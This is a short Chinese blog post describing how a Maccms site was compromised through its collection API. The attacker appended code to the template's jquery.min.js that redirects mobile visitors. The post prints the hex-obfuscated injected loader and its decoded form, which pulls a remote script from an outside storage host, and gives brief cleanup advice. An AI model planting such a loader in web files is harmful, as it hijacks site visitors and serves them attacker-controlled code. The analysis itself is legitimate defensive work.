苹果cms最新漏洞被挂马跳转劫持及清除代码

网站被挂马跳转劫持跳转到H APP下载页。

被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。

挂马图片

通过日志查看挂马过程

该漏洞是利用苹果CMS的API执行SHELL,

挂马文件在模板的jquery.min.js

;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是

var head = document.getElementsByTagName(‘head’)[0];
var script = document.createElement(‘script’);
script[‘src’] = ‘https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码

关闭后台采集API功能。或自定义API接口名字,
欢迎关注我的网站http://sexrenge.com

  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sexrenge

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值